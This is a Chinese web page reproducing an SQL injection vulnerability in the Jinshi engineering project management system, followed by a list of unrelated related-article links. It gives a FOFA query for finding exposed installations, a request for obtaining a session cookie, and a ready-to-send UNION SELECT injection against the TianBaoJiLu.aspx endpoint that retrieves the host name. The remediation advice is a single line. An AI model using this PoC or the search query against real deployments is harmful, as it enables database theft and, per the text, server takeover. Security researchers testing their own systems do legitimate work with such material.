当前位置: 首页 > article >正文

金石工程项目管理系统 SQL注入漏洞复现

0x01 产品简介

 金石工程项目管理软件是一款工程项目管理软件,专门针对建筑工程项目开发,可以用于各种工地的项目管理。

0x02 漏洞概述

  金石工程项目管理系统TianBaoJiLu.aspx接口处存在SQL注入漏洞,攻击者可通过该漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 复现环境

FOFA:

body="金石工程项目管理系统"

0x04 漏洞复现 

GET / HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

访问根目录获取有效cookie

 PoC

GET /query/shigongjihuajindu/TianBaoJiLu.aspx?id=1+Union+Select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,host_name(),23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Cookie: 获取到的cookie
Accept-Encoding: gzip

查询主机名

0x05 修复建议

目前已发布补丁信息,联系官方获取修复方案;www.jinshisoft.com


http://www.kler.cn/a/152011.html

相关文章:

  • Linux常用命令——pwd命令
  • Tomcat定时重启脚本
  • HTML5+CSS3小实例:纯CSS实现文字组成肖像特效
  • 【洛谷 B2038】奇偶 ASCII 值判断 题解(顺序结构+取余)
  • 读书笔记之《价值》张磊
  • Memcached最新2023年面试题,高级面试题及附答案解析
  • 【漏洞复现】通达OA inc/package/down.php接口存在未授权访问漏洞 附POC
  • 【长文干货】Python可视化教程
  • 【动态规划】LeetCode2552:优化了6版的1324模式
  • 使用JDBC操作数据库时,插入数据中文乱码
  • 类和对象——(3)再识对象
  • Android中添加C或C++代码
  • 【Python篇】详细讲解正则表达式
  • 解决warning: #188-D: enumerated type mixed with another type问题
  • 回顾Django的第二天
  • python高级练习题库实验1(A)部分
  • U-GAT-IT 使用指南:人脸动漫风格化
  • WTM(基于Blazor)问题处理记录
  • Linux 代码编辑器:vim
  • 网络数据结构skb_buff原理